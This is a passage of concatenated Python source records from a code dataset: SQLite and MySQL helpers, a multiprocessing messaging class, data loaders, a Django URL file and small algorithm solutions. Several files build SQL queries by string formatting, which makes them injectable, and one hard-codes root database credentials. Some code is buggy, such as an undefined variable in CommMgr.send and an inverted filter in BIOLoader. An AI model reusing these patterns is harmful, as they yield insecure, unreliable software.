example\"\n\n","sub_path":"speechmodule.py","file_name":"speechmodule.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"473448824","text":"import sqlite3 as sq\r\nfrom os.path import isfile\r\nfrom collections.abc import Iterable\r\n\r\n__author__ = \"Nadav Shani Date: 03/06/2020 (for last version)\"\r\n\r\n\r\nclass DBClass:\r\n    db_name = \"top5.db\"\r\n    table_name_qst_levels_12 = \"questionsAndAnswersLevel12\"\r\n    table_name_qst_level3 = \"questionsAndAnswersLevel3\"\r\n    table_name_players = \"top5\"\r\n    \r\n    def __init__(self):\r\n        \"\"\"\r\n        check if the db exists,\r\n        creates connection to db\r\n        and makes a cursor\r\n        \"\"\"\r\n        assert isfile(DBClass.db_name), \"Database doesn't exist!\"\r\n\r\n        self.conn = self.create_connection()\r\n        self.cursor = self.conn.cursor()\r\n\r\n    @staticmethod\r\n    def create_connection():\r\n        \"\"\" create a database connection to the SQLite database\r\n        :return: Connection object or None\r\n        \"\"\"\r\n        try:\r\n            conn = sq.connect(DBClass.db_name)\r\n        except sq.Error as e:\r\n            raise e\r\n        \r\n        return conn\r\n\r\n    def insert_qst_ans(self, question, answer, level, multi=False):\r\n        \"\"\"\r\n        inserts a question and an answer into the database\r\n        :param question: an English question\r\n        :param answer: question's English answer\r\n        :param multi: multiple questions and answers\r\n        :param level: question level (1 - 3)\r\n        :type question: Iterable\r\n        :type answer: Iterable\r\n        :type multi: bool\r\n        \"\"\"\r\n        assert type(answer) == list or isinstance(answer, Iterable),\\\r\n            \"Answer must be string or Iterable object.\"\r\n\r\n        assert type(question) == list or isinstance(question, Iterable), \\\r\n            \"Question must be string or Iterable object.\"\r\n\r\n        assert 1 <= level <= 3, \"Unknown level\"\r\n\r\n        if level == 3:\r\n            table_name = DBClass.table_name_qst_level3\r\n        else:\r\n            table_name = DBClass.table_name_qst_levels_12\r\n\r\n        command = \"INSERT INTO %s \" % table_name\r\n\r\n        if not multi:\r\n            command += \"(question, answer) VALUES ('%s', '%s');\" % (question,\r\n                                                                    answer)\r\n        else:\r\n            command += \"(question, answer) VALUES\"\r\n            for qst, ans in zip(question, answer):\r\n                command += f\"\\n('{qst}', '{ans}'),\"\r\n            command = command[:-1] + \";\"\r\n\r\n        try:\r\n            print(command)\r\n            
self.cursor.execute(command)\r\n except sq.Error as e:\r\n raise e\r\n self.conn.commit()\r\n\r\n def get_ans_qst_lst(self, level):\r\n \"\"\"\r\n :param level: question level (1 - 3)\r\n :return: list for questions and answers\r\n \"\"\"\r\n assert 1 <= level <= 3, \"Unknown level\"\r\n\r\n if level == 3:\r\n table_name = DBClass.table_name_qst_level3\r\n else:\r\n table_name = DBClass.table_name_qst_levels_12\r\n\r\n command = \"SELECT * FROM %s;\" % table_name\r\n return list(self.cursor.execute(command))\r\n\r\n def insert_player(self, name, score):\r\n \"\"\"\r\n inserts player name and score to top5 db\r\n :param name: player's name (str)\r\n :param score: player's score (int)\r\n :return: None\r\n \"\"\"\r\n command = \"UPDATE %s \" % self.table_name_players\r\n command += \"SET name_player = '%s', score = %d \" % (name, score)\r\n command += \"WHERE name_player = ( \"\r\n command += \"SELECT name_player \"\r\n command += \"FROM %s \" % self.table_name_players\r\n command += \"WHERE score < %d \" % score\r\n command += \"ORDER BY score ASC \"\r\n command += \"LIMIT 1 );\"\r\n\r\n self.cursor.execute(command)\r\n self.conn.commit()\r\n\r\n def get_top5(self):\r\n \"\"\"\r\n :return: list of the top5 players with their score\r\n \"\"\"\r\n command = \"SELECT * FROM top5 ORDER BY score DESC;\"\r\n return list(self.cursor.execute(command))[:5]\r\n\r\n def close_db(self):\r\n \"\"\"\r\n closes database\r\n \"\"\"\r\n try:\r\n self.conn.close()\r\n except Exception as e:\r\n print(e)\r\n","sub_path":"db_python_file.py","file_name":"db_python_file.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343400921","text":"\"\"\"\nRegistry for www subdomain\n\nContains allowed directories and file mappings\n\"\"\"\nfrom server.util import *\n\nallowed_directories = ['html', 'css', 'images']\n\nmappings = {'commands': 'html/commands.html',\n 'about': 'html/about.html',\n 'status': 'html/status.html',\n 'contact': 'html/contact.html',\n 'index': 'html/index.html',\n 'favicon.ico': 'images/icon.png',\n '': 'html/index.html'}\n\n\ndef allowed(dir):\n return dir in allowed_directories\n\n\ndef map(trans_path: TranslatedPath):\n if trans_path.path in mappings:\n trans_path.update(mappings[trans_path.path])\n","sub_path":"subdomains/www/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9745795","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport data_cleaning as dc\nimport json\nimport math\nimport asyncio\nimport Authentication as A\n\nasync def learning():\n client = MongoClient(\"mongodb://localhost:27017/\")\n mydb = client[\"ART_solutions\"]\n mycol = mydb[\"solutions\"]\n x=list(mycol.find())\n for obj in x:\n pprint(\"---->\"+obj[\"solutionID\"])\n obj[\"solutionID\"]=int(obj[\"solutionID\"])\n data_obj=x\n await asyncio.sleep(0.001)\n return dc.reorder_data(data_obj)\n\nasync def Authentication():\n await asyncio.sleep(0.001)\n return A.salesforcetokenAPI()\n\nasync def main():\n learn = loop.create_task(learning())\n Auth = loop.create_task(Authentication())\n await asyncio.wait([learn,Auth])\n return learn,Auth\n\n \nif __name__ == '__main__':\n try:\n loop=asyncio.get_event_loop()\n r1,r2 = loop.run_until_complete(main())\n pprint(r1)\n pprint(r2)\n except Exception as e:\n pass\n finally:\n 
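The `DBClass` record above assembles SQL with `%` string interpolation, so a quote inside a question or answer breaks the statement (and opens the door to injection). A sketch of the same inserts using sqlite3 parameter binding — the signature is simplified here and the helper is hypothetical, not the author's API:

```python
import sqlite3

# Sketch of insert_qst_ans using parameter binding instead of string
# interpolation; same table names as above, but quotes in the values no
# longer break the statement.
def insert_qst_ans(conn, question, answer, level):
    table = "questionsAndAnswersLevel3" if level == 3 else "questionsAndAnswersLevel12"
    # Table names cannot be bound as parameters, so they stay as trusted
    # constants; the values themselves are passed to execute() separately.
    sql = "INSERT INTO %s (question, answer) VALUES (?, ?)" % table
    if isinstance(question, str):
        conn.execute(sql, (question, answer))
    else:  # iterables of questions/answers, like the multi=True branch above
        conn.executemany(sql, zip(question, answer))
    conn.commit()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE questionsAndAnswersLevel12 (question TEXT, answer TEXT)")
insert_qst_ans(conn, ["What's SQL?", "2+2?"], ["a query language", "4"], level=1)
print(conn.execute("SELECT * FROM questionsAndAnswersLevel12").fetchall())
```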
loop.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299999309","text":"\nimport sys\nimport multiprocessing\nfrom multiprocessing import Process, Manager\n\nimport IoOps\n\n# basic parallel operations:\n# who-ami-i, how-big-is-the-world\n# block/non-blocking send and recv\n# broadcast, gather/scatter\n\n# we'll use negative tags for \"internal\" communication\n# : other than:\nANY_TAG = -1\nANY_PE = -1\n\nclass CommMgr():\n def __init__( self, **kwargs ):\n self.tid = kwargs.get( 'tid', -1 )\n self.ns = kwargs.get( 'namespace', None )\n self.num_pes = self.ns.num_pes\n\n # non-blocking send\n # : internal, allows negative tags\n def int_send( self, other_pe, tag, data ):\n comm = self.ns.msgLists[other_pe]\n comm.append( (self.tid,tag,data) )\n # TODO: check for errors\n return (0,0)\n\n # : external/blocking send, disallows negative tags other than -1==ANY_TAG\n def send( self, other_pe, tag, data ):\n if( tag < -1 ):\n return (-1,'ERROR_BAD_TAG')\n # send the data\n rtn = self.int_send( other_pe, tag, data )\n # wait for it to be grabbed/removed\n comm = self.ns.msgLists[other_pe]\n #msg = (other_pe,tag,data)\n all_done = False\n while not all_done:\n #if( not msg in comm ):\n # break\n all_done = True\n for msg in comm:\n if( (msg[0]==ns.tid) and (msg[1]==tag) \\\n and (msg[2]==data) ):\n all_done = False\n # TODO: add a throttle to this spin-loop\n return rtn\n\n # : external/non-blocking send, disallows negative tags other than -1==ANY_TAG\n def isend( self, other_pe, tag, data ):\n if( tag < -1 ):\n return (-1,'ERROR_BAD_TAG')\n return self.int_send( other_pe, tag, data )\n\n # blocking and non-blocking recv\n # : internal, allows negative tags\n def int_recv( self, blocking, rem_pe, tag ):\n recv_pe = -1\n recv_tag = -1\n recv_data = None\n\n comm = self.ns.msgLists[self.tid]\n # if blocking==false, then set all_done=True,\n # then we'll only do a single trip thru loop\n all_done = not blocking\n while not all_done:\n #for msg in comm:\n for n in range(len(comm)):\n msg = comm[n]\n # match on remote-pe?\n match_pe = False\n if( rem_pe == -1 ):\n match_pe = True\n elif( msg[0] == rem_pe ):\n match_pe = True\n\n # match on tag?\n match_tag = False\n if( tag == -1 ):\n match_tag = True\n elif( msg[1] == tag ):\n match_tag = True\n\n if( match_pe and match_tag ): \n (recv_pe,recv_tag,recv_data) = msg\n #print( 'msg='+str(msg) )\n # pull this msg out of the list\n #comm.remove( msg )\n comm.pop( n )\n all_done = True\n break\n \n # TODO: add a throttle to this spin-loop\n\n # TODO: check for errors\n return (recv_pe,recv_tag,recv_data)\n\n # : external/blocking recv, disallows negative tags other than -1==ANY_TAG\n def recv( self, rem_pe, tag ):\n if( tag < -1 ):\n return (-1,-1,'ERROR_BAD_TAG')\n return self.int_recv(True,rem_pe,tag)\n\n # : external/non-blocking recv, disallows negative tags other than -1==ANY_TAG\n def irecv( self, rem_pe, tag ):\n if( tag < -1 ):\n return (-1,-1,-1)\n return self.int_recv(False,rem_pe,tag)\n\n def barrier( self ):\n # post the sends\n for i in range(self.num_pes):\n if( i != self.tid ):\n self.int_send( i, -11, self.tid )\n # wait for recvs (this is a terrible way to do it)\n # TODO: wait for any matching message as they come in\n for i in range(self.num_pes):\n if( i != self.tid ):\n self.int_recv( True, i, -11 )\n return\n\n def collect( self, value ):\n rtn = [ 0 for i in range(self.num_pes) ]\n for 
i in range(self.num_pes):\n if( i != self.tid ):\n self.int_send( i, -22, value )\n for i in range(self.num_pes):\n if( i == self.tid ):\n rtn[i] = value\n else:\n msg = self.int_recv( True, i, -22 )\n rtn[i] = msg[2]\n return rtn\n\n #\n # For load/save to disk .. we ASSUME that all TIDs have same amount of data!\n def loadPopulation( self, gaMgr, filename ):\n start = self.tid * gaMgr.population_sz\n finish = start + gaMgr.population_sz\n pop = IoOps.loadPopulation( gaMgr, filename, start, finish)\n return pop\n\n # sort of 'for completeness' ...\n def randomPopulation( self, gaMgr, num ):\n return IoOps.randomPopulation( gaMgr, num )\n\n # dumb/brute-force approach ... all IO is done by TID=0\n # : this could have major memory and performance implications!\n def savePopulation( self, gaMgr, filename, mode='w' ):\n if( self.tid == 0 ):\n with open(filename,mode) as fp:\n # write TID-0 data first:\n for p in gaMgr.population:\n txt = p.packData()\n fp.write( txt + '\\n' )\n # now for each other TID in sequence ...\n for i in range(1,self.num_pes):\n x,y,data = self.int_recv( True, i, -123 )\n for p in data:\n txt = p.packData()\n fp.write( txt + '\\n' )\n else:\n # every other TID sends to TID=0\n self.int_send( 0, -123, gaMgr.population )\n\n\n\n# # # # # # # # # # # # # # # # # # # #\n\nclass ParallelMgr():\n def __init__( self, **kwargs ):\n num_pes = kwargs.get( 'num_pes', 1 )\n\n # TODO: compare num_pes to multiprocessing.cpu_count()\n\n # manager for manager-to-worker communication & shared namespace\n self.mpMgr = Manager()\n self.namespace = self.mpMgr.Namespace()\n # need a copy of num_pes\n self.namespace.num_pes = num_pes\n\n # manager for manager-to-worker communication\n self.namespace.masterList = [ self.mpMgr.list() for i in range(num_pes) ]\n # self.masterList = [ self.commMgr.list() for i in range(self.num_pes) ]\n\n # separate lists for direct PE-to-PE communication\n self.namespace.msgLists = [ self.mpMgr.list() for i in range(num_pes) ]\n # self.msgLists = [ self.commMgr.list() for i in range(self.num_pes) ]\n\n print( 'ParallelMgr init' )\n sys.stdout.flush()\n\n def runWorkers( self, workerModule ):\n # self.peList = [ workerModule(i,self.namespace) for i in range(self.namespace.num_pes) ]\n self.peList = []\n for i in range(self.namespace.num_pes):\n commMgr = CommMgr( tid=i, namespace=self.namespace )\n pid = workerModule( i, commMgr )\n self.peList.append( pid )\n for pe in self.peList:\n print( 'starting worker '+str(pe) )\n pe.start()\n # TODO: check for errors\n\n def finalize( self ):\n print( 'waiting for workers to finish' )\n for pe in self.peList:\n print( 'worker '+str(pe)+' is_alive='+str(pe.is_alive()) )\n \n for pe in self.peList:\n pe.join()\n # TODO: check for errors\n\n","sub_path":"PyGenAlg/ParallelMgr.py","file_name":"ParallelMgr.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191370183","text":"class Solution(object):\n def addBoldTag(self, s, dict):\n \"\"\"\n :type s: str\n :type dict: List[str]\n :rtype: str\n \"\"\"\n def find_all(s, sub):\n i = s.find(sub)\n while i != -1:\n yield i\n i = s.find(sub, i+1)\n intervals = []\n for word in dict:\n length = len(word)\n intervals.extend([[x, x + length] for x in find_all(s, word)])\n intervals.sort()\n merge = []\n for interval in intervals:\n if merge and merge[-1][1] >= interval[0]:\n merge[-1][1] = max(merge[-1][1], interval[1])\n else:\n merge.append(interval)\n if not merge: return s\n end = 
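`CommMgr` above implements point-to-point messaging by appending `(tid, tag, data)` tuples to per-PE `Manager` lists and spin-waiting on the receive side. A self-contained two-process round trip in the same style (the tag value and function names are arbitrary; the real class also matches on sender and supports wildcards):

```python
from multiprocessing import Manager, Process

# Minimal version of the mailbox scheme above: one shared list per PE,
# messages are (sender_tid, tag, data) tuples, recv spin-waits and pops.
def worker(tid, mailboxes):
    if tid == 0:
        mailboxes[1].append((0, 42, "hello from PE 0"))
    else:
        while True:  # blocking recv, without the TODO'd throttle
            for n in range(len(mailboxes[tid])):
                sender, tag, data = mailboxes[tid][n]
                if tag == 42:
                    mailboxes[tid].pop(n)
                    print("PE %d got %r from PE %d" % (tid, data, sender))
                    return

if __name__ == "__main__":
    mgr = Manager()
    mailboxes = [mgr.list() for _ in range(2)]
    procs = [Process(target=worker, args=(tid, mailboxes)) for tid in range(2)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
```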
0\n        res = []\n        for interval in merge:\n            res.append(s[end:interval[0]])\n            end = interval[1]\n            res.append('<b>' + s[interval[0]:interval[1]] + '</b>')\n        res.append(s[end:])\n        return ''.join(res)","sub_path":"leetcode/python/ex_616.py","file_name":"ex_616.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"312176962","text":"from tradgame import *\nimport os\nimport pandas as pd\nimport argparse\n\n\"\"\"\nUsage: python SingleRun.py [-h] [--delay delay] models [models ...]\n\nmodels reside in the models directory, so something like models/Team13Pricer.py\n\nIf your plot looks funny, try increasing the delay in the market: --delay=0.1\n\n\"\"\"\n\ngameParameters = {\"seed\" : 932748239, \"quotewidth\" : 0.3, \"delay\" : 0.001, \"steps\" : 200}\nimport sys\nfrom models import *\n\nif __name__=='__main__':\n\n    parser = argparse.ArgumentParser(description='List of Models')\n    parser.add_argument('models', metavar='models', nargs='+',\n                    help='a list of models to run')\n    parser.add_argument('--delay', metavar='delay', type=float, help='delay in seconds')\n    parser.add_argument('--seed', metavar='seed', type=int, help='seed for rng')\n\n    args = parser.parse_args()\n\n    if args.delay:\n        gameParameters['delay'] = args.delay\n    if args.seed:\n        gameParameters['seed'] = args.seed\n\n    # compatibility python2/3\n    try:\n        input = raw_input\n    except NameError:\n        pass\n\n\n    models = []\n    for model in args.models:\n        bn = os.path.basename(model)\n        if not bn.endswith(\".py\"):\n            print(\"Error %s is not a python file\"%bn)\n            sys.exit(-1)\n        module = sys.modules[\"models.%s\"%bn[:-3]]\n        models.append(getattr(module, \"pricer\"))\n\n    game = TradingGame(gameParameters)\n    game.run(models)\n    fout = open(\"events\", \"w\")\n    fout.write(\"%s\"%game.getEvents())\n    fout.close()\n    pp = EventPlot(game)\n    pp.plot()\n    print(game.ranking())\n    input(\"Any key to close plot\")\n    pp.close()\n    sys.exit(0)\n","sub_path":"BlackScholes_pricer/SingleRun.py","file_name":"SingleRun.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38566780","text":"# Despite the title we can run this script as often or as little as we want :)\nimport rethinkdb as r\nfrom cfapi import get_all_organizations, get_organization_projects\nfrom os import environ\n\n\ndef re_create_db_and_tables(conn, db_name, table_names):\n    drop_db_if_exists(conn, db_name)\n\n    r.db_create(db_name).run(conn)\n\n    # We build up the object by continuously calling table_create on it.\n    for table_name in table_names:\n        r.db(db_name).table_create(table_name).run(conn)\n\n    return\n\n\ndef drop_db_if_exists(conn, db_name):\n    try:\n        r.db_drop(db_name).run(conn)\n    except r.RqlRuntimeError:\n        # Thrown if database doesn't exist, do nothing\n        pass\n\n\ndef main():\n    table_names = [\"organizations\", \"projects\"]\n    db_name = \"cfa_raw\"\n\n    # Connect to RethinkDB host bound to RETHINKDB_IP or default to \"localhost\"\n    conn = r.connect(host=environ.get(\"RETHINKDB_IP\", \"localhost\"))\n\n    re_create_db_and_tables(conn, db_name, table_names)\n\n    organizations = get_all_organizations()\n    organizations_projects = {organization[\"name\"]: get_organization_projects(organization[\"all_projects\"])\n                              for organization in organizations}\n\n    # Add name as an element in the array so it will be inserted with each document\n    for org_name, projects in organizations_projects.iteritems():\n        for project in projects:\n            
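The `addBoldTag` solution above reduces to an interval problem: collect every occurrence of every dictionary word as a `[start, end)` span, sort, and merge any spans that overlap or touch (`merge[-1][1] >= interval[0]`). A small trace of just that phase (`merged_bold_spans` is a hypothetical extraction, not part of the original class):

```python
def merged_bold_spans(s, words):
    """Reproduce the interval phase of addBoldTag above: collect every
    occurrence of every word, sort, and merge overlapping/touching spans."""
    intervals = []
    for w in words:
        i = s.find(w)
        while i != -1:
            intervals.append([i, i + len(w)])
            i = s.find(w, i + 1)
    intervals.sort()
    merged = []
    for lo, hi in intervals:
        if merged and merged[-1][1] >= lo:   # overlap OR touching
            merged[-1][1] = max(merged[-1][1], hi)
        else:
            merged.append([lo, hi])
    return merged

# "abc" at [0, 3) and "cd" at [2, 4) overlap -> one bold span [0, 4)
print(merged_bold_spans("abcdef", ["abc", "cd"]))  # [[0, 4]]
```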
project[\"organization_name\"] = org_name\n\n r.db(\"cfa_raw\").table(\"organizations\").insert(organizations).run(conn)\n # Insert every project as a separate document into the \"projects\" table\n # (we can get back to it with the \"organization_name\" property\n for projects in organizations_projects.values():\n r.db(\"cfa_raw\").table(\"projects\").insert(projects).run(conn)\n\n\n# If we run this module as a script, it deletes and rebuilds the RethinkDB\n# db and then re-fetches the data using the Code For America api\n# (http://codeforamerica.org/api/)\nif __name__ == '__main__':\n main()\n","sub_path":"brigadepulse/drop_and_reload_brigade_data.py","file_name":"drop_and_reload_brigade_data.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358034168","text":"def numberOfWaysToMakeChange(n, denoms):\n ways = [0 if i > 0 else 1 for i in range(n +1)]\n for i in denoms:\n for j in range(n + 1):\n if i <= j:\n ways[j] = ways[j] + ways[j - i]\n return ways[len(ways) - 1]\n\n\nprint(numberOfWaysToMakeChange(25, [1, 5, 10, 25]))\n","sub_path":"oldCodes/numberOfWaysToMakeChange.py","file_name":"numberOfWaysToMakeChange.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"200129134","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'user'\nurlpatterns = [\n path('', views.index, name='index'),\n path('profile/', views.profile, name='browseotherprofile'),\n path('profile/', views.own_profile, name='browseownprofile'),\n path('signup/', views.signup_view, name=\"signup\"),\n path('login/', views.login_view, name='login'),\n path('review/', views.review, name='review'),\n path('edit_profile/', views.editprofile, name='editprofile'),\n path('logout/', views.userlogout, name=\"logout\"),\n # anyone with access to the link can leave a review - Implement something else with checkout.\n]\n","sub_path":"hellgames/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26879931","text":"import multiprocessing\nimport functools\nimport re\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\nfrom inhousednn.data_loader.loader import Loader, split_by_chunk_num, split_by_chunk_size\nfrom collections import defaultdict\n\nLINE_BATCH_SIZE = 50000\nMAX_SENT_LEN = 100\nMAX_WORD_LEN = 25\n\n\nclass BIOLoader(Loader):\n def __init__(self, train=None, dev=None, test=None):\n super(BIOLoader, self).__init__(train, dev, test)\n\n def generate_idx_mapping(self, zeros=False, lower=False):\n def read_in_batches(file_object, batch_size=LINE_BATCH_SIZE):\n \"\"\"Lazy function (generator) to read a file piece by piece.\n Default batch size: 1k.\"\"\"\n while True:\n data = file_object.read(batch_size)\n if not data:\n break\n yield data\n\n def gen_freq_dict(file_path):\n if not file_path:\n return {}\n word_freq_dict = defaultdict(int)\n char_freq_dict = defaultdict(int)\n label_freq_dict = defaultdict(int)\n with open(file_path) as f:\n for batch in read_in_batches(f):\n with multiprocessing.Pool(\n processes=multiprocessing.cpu_count()\n ) as p:\n chunks = split_by_chunk_num(batch,\n multiprocessing.cpu_count())\n partial_gen_mapping_thread = functools.partial(\n gen_mapping_thread, zeros=zeros, lower=lower)\n pool_result = 
p.map_async(\n partial_gen_mapping_thread, chunks\n )\n for dico in pool_result.get():\n for k, v in dico[0].items():\n word_freq_dict[k] += v\n for k, v in dico[1].items():\n char_freq_dict[k] += v\n for k, v in dico[2].items():\n label_freq_dict[k] += v\n return word_freq_dict, char_freq_dict, label_freq_dict\n\n #\n # generate frequency dicts\n #\n train_freq_dict = gen_freq_dict(self.train)\n dev_freq_dict = gen_freq_dict(self.dev)\n test_freq_dict = gen_freq_dict(self.test)\n\n # merge frequency dicts\n word_freq_dict = train_freq_dict[0]\n char_freq_dict = train_freq_dict[1]\n label_freq_dict = train_freq_dict[2]\n for d in [dev_freq_dict, test_freq_dict]:\n for k, v in d[0].items():\n word_freq_dict[k] += v\n for k, v in d[1].items():\n char_freq_dict[k] += v\n for k, v in d[2].items():\n label_freq_dict[k] += v\n\n # add unk and padding to word and char dict\n word_freq_dict[''] = 10000001\n word_freq_dict[''] = 10000000\n char_freq_dict[''] = 10000001\n char_freq_dict[''] = 10000000\n\n #\n # create mapping\n #\n word_to_id, id_to_word = create_mapping(word_freq_dict)\n char_to_id, id_to_char = create_mapping(char_freq_dict)\n\n return word_to_id, id_to_word, char_to_id, id_to_char\n\n @staticmethod\n def extract(file_path):\n batch = []\n with open(file_path) as f:\n for line in f:\n line = line.strip()\n if not line and len(batch) > LINE_BATCH_SIZE:\n yield batch\n batch.clear()\n else:\n batch.append(line)\n # yield the last batch\n yield batch\n\n @staticmethod\n def transform(extract_generator, word_to_id, char_to_id, label_to_id):\n for batch in extract_generator:\n instances = filter(lambda x: not x.strip(),\n '\\n'.join(batch).split('\\n\\n'))\n # batch_word_idx = []\n # batch_char_idx = []\n # batch_label_idx = []\n for sent in instances:\n items = [line.split(' ') for line in sent.splitlines()]\n words = [item[0] for item in items[:MAX_SENT_LEN]]\n chars = [list(w)[:MAX_WORD_LEN] for w in words]\n labels = [item[-1] for item in items]\n\n words_idx = [word_to_id[w] for w in words]\n char_idx = [[char_to_id[c] for c in w] for w in chars]\n labels_idx = [label_to_id[l] for l in labels]\n\n # batch_word_idx.append(words_idx)\n # batch_char_idx.append(char_idx)\n # batch_label_idx.append(labels_idx)\n\n yield words_idx, char_idx, labels_idx\n\n @staticmethod\n def load(transform_generator, model_batch_size):\n dataset = Dataset.from_generator(transform_generator,\n (tf.int64, tf.int64, tf.int64))\n batch_dataset = dataset.batch(model_batch_size)\n\n batch_dataset = batch_dataset.prefetch(buffer_size=50)\n\n return batch_dataset\n\n # for batch in transform_generator:\n # batch_word_idx, batch_char_idx, batch_label_idx = batch\n # model_batches = split_by_chunk_size(batch, model_batch_size)\n #\n # for b in model_batches:\n\n\n\n\ndef gen_mapping_thread(chunk, zeros=False, lower=False):\n word_freq_dict = defaultdict(int)\n char_freq_dict = defaultdict(int)\n label_freq_dict = defaultdict(int)\n for item in chunk:\n item = item.strip().split(' ')\n if not item:\n continue\n word = item[0]\n\n if zeros:\n word = zero_digits(word)\n if lower:\n word = word.lower()\n chars = list(word)\n\n word_freq_dict[word] += 1\n for c in chars:\n char_freq_dict[c] += 1\n\n label = item[-1]\n label_freq_dict[label] += 1\n\n return word_freq_dict, char_freq_dict, label_freq_dict\n\n\ndef zero_digits(s):\n \"\"\"\n Replace every digit in a string by a zero.\n \"\"\"\n return re.sub('\\d', '0', s)\n\n\ndef create_mapping(dico):\n \"\"\"\n Create a mapping (item to ID / ID to item) from a 
dictionary.\n Items are ordered by decreasing frequency.\n \"\"\"\n sorted_items = sorted(dico.items(), key=lambda x: (-x[1], x[0]))\n id_to_item = {i: v[0] for i, v in enumerate(sorted_items)}\n item_to_id = {v: k for k, v in id_to_item.items()}\n return item_to_id, id_to_item\n","sub_path":"inhousednn/task/sequence_labeling/BIOLoader.py","file_name":"BIOLoader.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"142372268","text":"import pymysql\n\ndef server_phthon_database():\n db = pymysql.connect(\"localhost\", \"root\", \"123456\",\n \"python_manito\", charset=\"utf8\")\n cur = db.cursor()\n cur.execute(\"create table usermsg(\\\n username char(20),\\\n passwd char(20),\\\n time char(30),\\\n score int)default charset=utf8;\")\n cur.execute(\"create table test_table(\\\n testid int auto_increment,\\\n username varchar(20),\\\n time char(30),\\\n title varchar(50),\\\n test varchar(15000),\\\n reading int default 0,\\\n upvote int default 0,\\\n upnames varchar(1000) default '',\\\n primary key(testid))auto_increment=1 \\\n default charset=utf8;\")\n cur.execute(\"create table reply_table(\\\n t_id int,\\\n postname varchar(20),\\\n floor int default 0,\\\n reply varchar(5000) default '',\\\n foreign key(t_id) references test_table(testid)\\\n on delete cascade \\\n on update cascade)default charset=utf8;\")\n cur.execute(\"create table temporary(\\\n ntid int auto_increment,\\\n username varchar(20),\\\n time char(30),\\\n title varchar(50),\\\n test varchar(15000),\\\n primary key(ntid))auto_increment=1 \\\n default charset=utf8;\")\n PATH = './'\n with open(PATH+'usermsg', 'rt') as fu:\n while True:\n m = fu.readline()\n m = m.strip()\n if not m:\n break\n l = m.split(',')\n s = \"insert into usermsg values('%s','%s','%s',%d);\"\\\n % (l[0], str(l[1]), str(l[2]),int(l[3]))\n cur.execute(s)\n with open(PATH+'tieba', 'rt') as ft:\n count = 0\n while True:\n count += 1\n m = ft.readline()\n m = m.strip()\n if not m:\n break\n l = m.split(',')\n with open(PATH+'post/'+l[3], 'rt') as fs:\n t = fs.read()\n s = \"insert into test_table values(%d,'%s','%s','%s','%s',%d,%d,'%s');\"\\\n % (int(l[0]), str(l[1]), str(l[2]), str(l[3]), t, int(l[5]), \\\n int(l[6]), str(l[7]))\n cur.execute(s)\n rs1='''\\n[1楼]:感谢老天啊,终于抢到一楼了,哈哈哈...\nlaoyu 2017-03-20-10:31:35\\n\n[2楼]:额滴神哪,抢个一楼高兴成这样,没见过世面.能不能关注重点,这是python社区。\nxixi 2017-03-20-14:13:26\\n\\n'''\n sql=\"insert into reply_table value(1,'%s',2,'%s');\"%('~python简介~.txt',rs1)\n cur.execute(sql)\n rs2='''\\n[1楼]:这是哪啊,好安静,谁能告诉我python是个啥?\nlulu 2017-04-21-11:26:33\\n\n[2楼]:问我吗,我也不知道,上电梯时一群人把我推进了电梯,莫名其秒来到了7楼达内,看来这辈子要和python结缘了。\nshock 2017-04-22-16:21:56\\n\\n'''\n sql=\"insert into reply_table value(2,'%s',2,'%s');\"%('~python为什么这么火~.txt',rs2)\n db.commit()\n print('python大神贴吧已建立!')\n cur.close()\n db.close()\n\nserver_phthon_database()\n","sub_path":"project_v1.5/sql&server/create_postbar/createpost.py","file_name":"createpost.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"111037228","text":"'''\nCreated on Nov 20, 2014\n\n@author: noampeled\n'''\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nfrom sklearn.feature_selection import SelectKBest, f_classif\n\n\nclass ChannelsSelector(SelectKBest):\n\n def __init__(self, k):\n super(ChannelsSelector, self).__init__(f_classif, k=k)\n\n def fit(self, X, y):\n self.T = 
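`create_mapping` above sorts a frequency dict by descending count (ties broken alphabetically) and assigns contiguous ids; together with the inflated counts given to `<PAD>` and `<UNK>` earlier in the record, the two specials always land at ids 0 and 1. A quick check on a toy corpus:

```python
from collections import defaultdict

def create_mapping(dico):
    # Same logic as above: sort by (-frequency, key), then enumerate.
    sorted_items = sorted(dico.items(), key=lambda x: (-x[1], x[0]))
    id_to_item = {i: v[0] for i, v in enumerate(sorted_items)}
    item_to_id = {v: k for k, v in id_to_item.items()}
    return item_to_id, id_to_item

freq = defaultdict(int)
for w in "the cat sat on the mat".split():
    freq[w] += 1
freq["<PAD>"] = 10000001   # huge counts pin the specials to the lowest ids
freq["<UNK>"] = 10000000
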